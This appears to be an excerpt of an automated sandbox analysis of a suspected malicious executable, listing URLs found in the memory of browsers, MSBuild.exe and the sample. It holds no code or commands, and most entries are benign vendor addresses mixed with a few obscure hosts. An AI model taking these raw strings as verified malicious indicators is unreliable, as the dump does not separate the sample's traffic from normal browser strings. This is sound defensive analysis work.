Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754195245.00007BAC02580000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754775930.00007BAC028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754142197.00007BAC027F4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754391416.00007BAC01CE4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754573554.00007BAC02968000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754803717.00007BAC029C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1753974560.00007BAC028EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754447420.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754351019.00007BAC02964000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000005.00000003.1649895511.0000123803E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649849557.0000123803E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000005.00000003.1649895511.0000123803E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649849557.0000123803E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/ogl
Source: chromecache_168.7.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log1.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log1.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log1.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 000003.log1.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eu-9.smartscreen
Source: msedge.exe, 00000009.00000003.1754012270.00007BAC00C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fb.me/react-polyfills
Source: chromecache_165.7.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_165.7.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_165.7.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_165.7.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: msedge.exe, 00000009.00000003.1758347965.00007BAC02A0C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754012270.00007BAC00C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/focus-trap/tabbable/blob/master/LICENSE
Source: msedge.exe, 00000009.00000003.1758347965.00007BAC02A0C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754012270.00007BAC00C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/jsstyles/css-vendor
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/$
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/-
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/.
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/?
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000005.00000003.1599244220.00003AC800878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1643947692.0000123804028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1644116168.0000123804030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hk.eynbm.com
Source: gvk6ph.2.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649895511.0000123803E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649849557.0000123803E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000005.00000003.1649895511.0000123803E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649849557.0000123803E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000005.00000003.1599312463.00003AC800880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login-us.microsoftonline.com/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.chinacloudapi.cn/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.cloudgovapi.us/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoft-ppe.com/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.de/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.us/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.usgovcloudapi.net/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.windows-ppe.net/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.windows.net/
Source: chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://malaysia.smartscreen.mic
Source: chrome.exe, 00000005.00000003.1642339945.0000123803144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1644693557.0000123803144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1641339473.0000123803140000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000005.00000003.1642339945.0000123803144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1644693557.0000123803144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1641339473.0000123803140000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000005.00000003.1615872583.00001238031A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://newzealand.smartscreen.m10.0.19045.2006.vb_release
Source: msedge.exe, 00000009.00000003.1787356007.00007BAC020E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ntp.msn
Source: msedge.exe, 00000009.00000003.1787499005.00007BAC027AC000.00000004.00000800.00020000.00000000.sdmp, 000003.log.9.dr String found in binary or memory: https://ntp.msn.com/
Source: Session_13382090435239232.9.dr String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000005.00000003.1637449896.0000123802E88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/devicemanagement/data/api
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: chrome.exe, 00000005.00000003.1615872583.00001238031A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618476289.0000123802E88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
